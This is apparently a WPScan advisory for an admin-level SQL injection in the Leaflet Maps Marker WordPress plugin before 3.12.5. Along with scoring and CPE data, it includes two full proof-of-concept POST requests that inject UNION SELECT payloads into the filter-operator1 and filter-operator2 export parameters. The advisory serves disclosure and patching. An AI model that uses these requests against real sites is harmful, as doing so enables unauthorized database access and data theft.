Leaflet Maps Marker < 3.12.5 - Admin+ SQLi

2022-08-0800:00:00

Ihor Bliumental

wpscan.com

0.001 Low

EPSS

Percentile

37.9%

JSON

The plugin does not properly sanitize some parameters before inserting them into SQL queries. As a result, high privilege users could perform SQL injection attacks.

PoC

PoC for filter-operator1 parameter: POST /wp-content/plugins/leaflet-maps-marker/inc/import-export/start.php?action_iframe=export&_wpnonce=24f109ac38 HTTP/1.1 Host: 127.0.0.1:8000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 476 Origin: http://127.0.0.1:8000 Connection: close Referer: http://127.0.0.1:8000/wp-content/plugins/leaflet-maps-marker/inc/import-export/start.php?action_iframe=export&_wpnonce=24f109ac38 Cookie: [admin+] Upgrade-Insecure-Requests: 1 action_standalone=export&filter-layer;=select-all&limit-from;=0&limit-to;=100&filter-markername;=NOT_FOUND&filter-operator1;=)+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37–+&filter-popuptext;=1&filter-exclude-markername;=&filter-operator2;=AND&filter-exclude-popuptext;=&filter-icon;=icon-any&export-format;=csv&caching-method;=auto&caching-discisam-directory;=&caching-phptemp-filesize;=8&submit;=start+export ====== PoC for filter-operator2 parameter: POST /wp-content/plugins/leaflet-maps-marker/inc/import-export/start.php?action_iframe=export&_wpnonce=24f109ac38 HTTP/1.1 Host: 127.0.0.1:8000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 474 Origin: http://127.0.0.1:8000 Connection: close Referer: http://127.0.0.1:8000/wp-content/plugins/leaflet-maps-marker/inc/import-export/start.php?action_iframe=export&_wpnonce=24f109ac38 Cookie: [admin+] Upgrade-Insecure-Requests: 1 action_standalone=export&filter-layer;=select-all&limit-from;=0&limit-to;=100&filter-markername;=&filter-operator1;=&filter-popuptext;=1&filter-exclude-markername;=1&filter-operator2;=)+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37–+&filter-exclude-popuptext;=NOT_FOUND&filter-icon;=icon-any&export-format;=csv&caching-method;=auto&caching-discisam-directory;=&caching-phptemp-filesize;=8&submit;=start+export

CPENameOperatorVersion
leaflet-maps-markerlt3.12.5

CPE	Name	Operator	Version
	leaflet-maps-marker	lt	3.12.5

0.001 Low

EPSS

Percentile

37.9%

JSON

Related for WPVDB-ID:03E0D4D5-0184-4A15-B8AC-FDC2010E4812